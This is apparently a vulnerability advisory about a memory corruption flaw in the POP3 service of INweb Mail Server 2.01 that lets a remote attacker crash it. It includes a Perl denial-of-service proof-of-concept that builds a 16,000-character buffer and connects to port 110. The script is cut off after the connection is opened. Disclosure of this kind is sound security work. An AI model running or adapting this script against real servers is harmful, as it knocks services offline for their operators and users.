The INweb Mail Server is a standard Internet POP3 and SMTP mail server that runs flawlessly under Windows 2000 and NT and other windows platforms. The INweb Mail Server provides numerous unique features for both small and large businesses as well as ISP's. This includes many facilities to handle spam and viruses. Due to a memory corruption problem a remote attacker is able to crash the server.
Credit:
The information has been provided by Tamer Sahin.
Vulnerable systems:
* INweb Mail Server version 2.01
Memory corruption vulnerability exists in INweb Mail Server. The POP3 server included with INweb Mail Server does not properly handle some types of requests. By submitting a maliciously crafted request to the POP3 server, an attacker could crash the system, resulting in a denial of service.
Exploit:
An exploit for this vulnerability exists and is available below.
#!/usr/bin/perl -w
use IO::Socket;
$host = $ARGV[0];
$port = "110";
$evil = "A" x 16000;
print "INweb Mail Server v2.01 Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port)
|| die "Connection failed.\n";
